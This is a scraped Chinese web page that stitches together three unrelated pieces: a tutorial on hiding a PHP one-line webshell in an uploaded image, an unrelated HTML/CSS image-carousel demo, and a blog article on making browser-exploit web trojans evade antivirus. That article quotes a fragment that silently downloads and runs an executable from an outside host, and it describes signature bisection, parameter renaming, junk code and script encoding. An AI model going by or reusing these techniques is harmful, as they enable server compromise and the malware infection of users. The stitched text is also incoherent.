片馬:就是在圖片中隱藏一句話木馬。利用.htaccess等解析圖片為PHP或者asp文件。達(dá)到執(zhí)行圖片內(nèi)代碼目的
制作方法:
注意以下幾點(diǎn):
將一個(gè)圖片以文本格式打開(這里用的notepad++.以記事本方式打開修改也能連接成功,不過(guò)修改后圖片無(wú)法正常顯示了),
后面粘貼上一句話木馬
上傳圖片
連接蟻劍,嗯,很好,連接成功
在windows的cmd中執(zhí)行
可以看到末尾已經(jīng)有一句話木馬了
上傳之后連接試試,成功
用winhex打開圖片,添加一句話木馬
上傳,連接成功
先打開圖片
點(diǎn)擊文件->文件簡(jiǎn)介
添加木馬
上傳,連接成功
原文鏈接:https://www.cnblogs.com/Linkas/p/15101706.html
轉(zhuǎn)木馬
有些小伙伴0基礎(chǔ)小伙伴擔(dān)心,我沒有編程工具怎么辦?
這個(gè)不需要編程工具的,只需要找9張圖片改改名稱就行
(1) 新建一個(gè)文件夾
(2) 文件夾中新建img文件夾 以及一個(gè)txt文檔
(3) 把我放在下面的代碼粘貼到txt文檔中
(4)沒有txt后綴的這樣設(shè)置一下(這里以win11為例,點(diǎn)擊查看-->顯示-->文件擴(kuò)展名)
(5)把文本文檔名稱改為旋轉(zhuǎn)木馬.html
(6)把圖片放在img文件夾里面,需要9張
(7)圖片重命名為 1.jpg 2.jpg 3.jpg 以此規(guī)律命名(200 x 300 像素的圖片)
(8)設(shè)置圖片像素(用win自帶照片軟件打開-->點(diǎn)擊... --> 重設(shè)大小-->自定義尺寸-->把寬度改成200、高度改成200-->保存)
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
<style>
*{
margin: 0;
padding: 0;
}
.box{
width: 200px;
height: 300px;
/* border: 1px solid black; */
margin: 50px auto;
position: relative;
/* 設(shè)置3D 效果 */
transform-style: preserve-3d;
/* 添加3D視距 透視效果 */
/* perspective: 300px; */
transform: rotateX(-15deg);
/* CSS animation動(dòng)畫屬性
name 定義動(dòng)畫名稱
duration 定義動(dòng)畫執(zhí)行時(shí)間 秒/單位
timing-function 定義動(dòng)畫執(zhí)行速度 linear 勻速
delay 定義動(dòng)畫執(zhí)行等待 秒/單位
iteration-count 定義動(dòng)畫執(zhí)行次數(shù) 默認(rèn)為1 無(wú)限執(zhí)行 infinite
animation-play-state 動(dòng)畫運(yùn)行狀態(tài)控制 默認(rèn)running運(yùn)行 paused 暫停
*/
/* animation: name duration timing-function delay iteration-count direction fill-mode; */
animation: move 10s linear infinite;
}
/* 定義關(guān)鍵幀動(dòng)畫 執(zhí)行我們定義的動(dòng)畫 */
@keyframes move{
0%{
/* 在CSS3 變幻屬性中 如果要給一個(gè)元素添加多個(gè)變幻屬性
需要將所有的變幻屬性都寫在transform
*/
transform:rotateX(-15deg) rotateY(0deg);
}
100%{
transform:rotateX(-15deg) rotateY(360deg);
}
}
/* :hover 偽類選擇器 設(shè)置用戶鼠標(biāo)移入時(shí)的效果 */
.box:hover{
/* 當(dāng)用戶鼠標(biāo)移入時(shí) 動(dòng)畫由默認(rèn)的運(yùn)行狀態(tài)變成暫停 */
animation-play-state: paused;
}
.box div{
position: absolute;
left: 0;
top: 0;
width: 200px;
height: 300px;
margin-top: 50px;
}
/* :nth-child(1) */
.box div:nth-child(1){
/* 改變頁(yè)面第一張圖片 變幻屬性
transform 變幻屬性
rotate 旋轉(zhuǎn)
translate 位移
*/
transform: rotateY(40deg) translateZ(275px);
}
.box div:nth-child(2){
transform: rotateY(80deg) translateZ(275px);
}
.box div:nth-child(3){
transform: rotateY(120deg) translateZ(275px);
}
.box div:nth-child(4){
transform: rotateY(160deg) translateZ(275px);
}
.box div:nth-child(5){
transform: rotateY(200deg) translateZ(275px);
}
.box div:nth-child(6){
transform: rotateY(240deg) translateZ(275px);
}
.box div:nth-child(7){
transform: rotateY(280deg) translateZ(275px);
}
.box div:nth-child(8){
transform: rotateY(320deg) translateZ(275px);
}
.box div:nth-child(9){
transform: rotateY(360deg) translateZ(275px);
}
</style>
</head>
<body>
<div class="box">
<div>
<img src="./img/1.jpg" alt="">
</div>
<div>
<img src="./img/2.jpg" alt="">
</div>
<div>
<img src="./img/3.jpg" alt="">
</div>
<div>
<img src="./img/4.jpg" alt="">
</div>
<div>
<img src="./img/5.jpg" alt="">
</div>
<div>
<img src="./img/6.jpg" alt="">
</div>
<div>
<img src="./img/7.jpg" alt="">
</div>
<div>
<img src="./img/8.jpg" alt="">
</div>
<div>
<img src="./img/9.jpg" alt="">
</div>
</div>
</body>
</html>
上一篇:ABB機(jī)器人Sockets通訊
近一段時(shí)間,很多國(guó)內(nèi)知名的應(yīng)用程序都出現(xiàn)了很嚴(yán)重的安全漏洞,而這些漏洞的運(yùn)用方法也都出奇地一致——網(wǎng)頁(yè)木馬。可是網(wǎng)頁(yè)木馬和木馬程序一樣,一經(jīng)推出就會(huì)很快被殺毒軟件所查殺。關(guān)于木馬程序的免殺已經(jīng)介紹過(guò)很多了,今天就來(lái)看看網(wǎng)頁(yè)木馬是如何進(jìn)行免殺制作的。
一.百度搜索網(wǎng)頁(yè)木馬
百度搜霸漏洞是由于BaiduBar.dll ActiveX控件中存在一個(gè)可以供遠(yuǎn)程代碼執(zhí)行的高危漏洞。運(yùn)行百度搜霸漏洞網(wǎng)頁(yè)木馬生成器來(lái)創(chuàng)建一個(gè)自己需要的網(wǎng)頁(yè)木馬文件。分別利用瑞星和卡巴斯基對(duì)這個(gè)文件進(jìn)行查殺,發(fā)現(xiàn)目前只有瑞星可以對(duì)這個(gè)文件進(jìn)行查殺。
現(xiàn)在我們就利用常見的源代碼折半法來(lái)進(jìn)行文件特征碼的尋找井進(jìn)行查殺,所謂源代碼折半法,就是把源代碼從中一分為二,接替來(lái)查看哪一部分代碼被殺,如果發(fā)現(xiàn)兩層以上的特征碼再將這段分開,然后依次類推縮小范圍,最終找到文件中特征碼的所在位置,這也是網(wǎng)頁(yè)木馬免殺最常用的檢測(cè)方法。
由于百度搜霸網(wǎng)頁(yè)木馬的代碼很少很清晰,因此制作免殺起來(lái)還是有一定的難度的,所以我們只能從文件代碼中間進(jìn)行修改操作。舉個(gè)例子,比如說(shuō)“( "http://www.weixanmanbu.com/cak.cab","muma .exe",0)”,這段代碼是網(wǎng)頁(yè)木馬先利用DloadDS()函數(shù)下載CAB文件,然后在本地將其轉(zhuǎn)化為可執(zhí)行文件再運(yùn)行,在這段代碼最后有一個(gè)參數(shù)0,它的作用就是讓下載的文件不顯示給用戶。我們只需要把參數(shù)0改為1,網(wǎng)頁(yè)木馬文件就可以起到免殺的效果了。不過(guò)問(wèn)題也隨之而來(lái)了,改成1后網(wǎng)頁(yè)木馬會(huì)彈出一個(gè)提示窗口,這個(gè)樣子很容易被發(fā)現(xiàn)并引起用戶的懷疑。那應(yīng)該怎么辦呢?其實(shí)操作起來(lái)很簡(jiǎn)單。我們只需要將參數(shù)0改為00,就可以輕易的躲過(guò)瑞星殺毒軟件的檢測(cè)。
二.PPStream網(wǎng)頁(yè)木馬
PPStream網(wǎng)頁(yè)木馬是通過(guò)PPStream的堆棧溢出產(chǎn)生的。首先還是通過(guò)PPStream漏洞生成器來(lái)創(chuàng)建一個(gè)網(wǎng)頁(yè)木馬文件,接著通過(guò)金山毒霸對(duì)其進(jìn)行查殺,毋庸置疑已經(jīng)被查殺了。我們還是先通過(guò)源代碼折半法來(lái)確定特征碼的位置,經(jīng)過(guò)測(cè)試發(fā)現(xiàn)特征碼處于<objeot id="ppc" Classid=”CLSID:5EC7C511-CDOF-42E6-830C-1BD9882F3458">這段中。其實(shí)制作過(guò)免殺網(wǎng)頁(yè)木馬的用戶一眼就可以看出,問(wèn)題一定是在ppc這個(gè)參數(shù)里面,因?yàn)閰?shù)從來(lái)就是殺毒軟件特征碼的提取內(nèi)容。我們將ppc改為duba,然后網(wǎng)頁(yè)木馬文件就免殺了。不過(guò)需要大家注意的是,這段代碼和后面的是相連的,因此只要使用ppc參數(shù)的,就需要改成duba才可以。這個(gè)方法對(duì)于其它的殺毒軟件,比如瑞星也可以起到免殺的效果。
三.暴風(fēng)影音網(wǎng)頁(yè)木馬
暴風(fēng)影音網(wǎng)頁(yè)木馬是由于暴風(fēng)影音II中mps.dll組件多個(gè)緩沖區(qū)溢出漏洞造成的,也是近期非常熱門的一個(gè)軟件漏洞。創(chuàng)建好我們的網(wǎng)頁(yè)木馬后進(jìn)仟查殺,發(fā)現(xiàn)很多殺毒軟件都能夠?qū)⑵洳闅ⅰM瑯油ㄟ^(guò)路改參數(shù)就可以避過(guò)金山毒霸的查殺,但卻無(wú)法過(guò)瑞星和卡巴斯基。
我們找到memory=new Array();,接著在其下面添加一句google=memory。本來(lái)變量memory是直接轉(zhuǎn)向new Array()的,現(xiàn)在我們?cè)谥虚g添加了一句新的代碼,這樣就讓google先轉(zhuǎn)到變量memory,然后再?gòu)膍emory轉(zhuǎn)向new Array()。實(shí)際上就是讓代碼多走了一步路,這在程序中本來(lái)是不應(yīng)該存在的,這么做就相當(dāng)于在網(wǎng)頁(yè)代碼里而添加了一段花指令。保存修改后再查殺網(wǎng)頁(yè)木馬文件,發(fā)現(xiàn)已經(jīng)通過(guò)了瑞星的檢測(cè)。
網(wǎng)頁(yè)木馬的免殺除了這種修改源代碼的方法外。還可以利用代碼加密的方法來(lái)進(jìn)行免殺操作。網(wǎng)頁(yè)木馬的加密方法有很多,常用的就是微軟的JScript.Encode腳本來(lái)加密,當(dāng)然用戶自己編寫加密函數(shù)效果會(huì)更好。現(xiàn)在同上這種在線進(jìn)行JScript.Encode加密解密的網(wǎng)頁(yè)也有很多,只需要將網(wǎng)頁(yè)木馬源代碼粘貼在網(wǎng)頁(yè)的輸入框內(nèi),接著按“Encodc解密”按鈕就可以了。需要用戶注意的是,加密時(shí)應(yīng)該只對(duì)腳本部分進(jìn)行加密,不需要對(duì)<script language="">腳本標(biāo)記進(jìn)行加密,并且加密后腳本標(biāo)記應(yīng)該改為<script language ="JScript.Encode">。
到此為止,關(guān)于網(wǎng)頁(yè)木馬免殺的相關(guān)內(nèi)容就為大家介紹到這兒,從上面的介紹我們可以看到,網(wǎng)頁(yè)木馬免殺的方法相對(duì)于可執(zhí)行文件來(lái)說(shuō)還是非常有限的。不過(guò)用戶只需要利用好過(guò)有限的方法,就可以將網(wǎng)頁(yè)木馬隱形于眾多的殺毒軟件面前,當(dāng)然這種方法也適用于ASP、PHP這樣的網(wǎng)頁(yè)木馬。
本文來(lái)自 危險(xiǎn)漫步博客 轉(zhuǎn)載請(qǐng)注明;
本文地址:http://www.weixianmanbu.com/article/1143.html
*請(qǐng)認(rèn)真填寫需求信息,我們會(huì)在24小時(shí)內(nèi)與您取得聯(lián)系。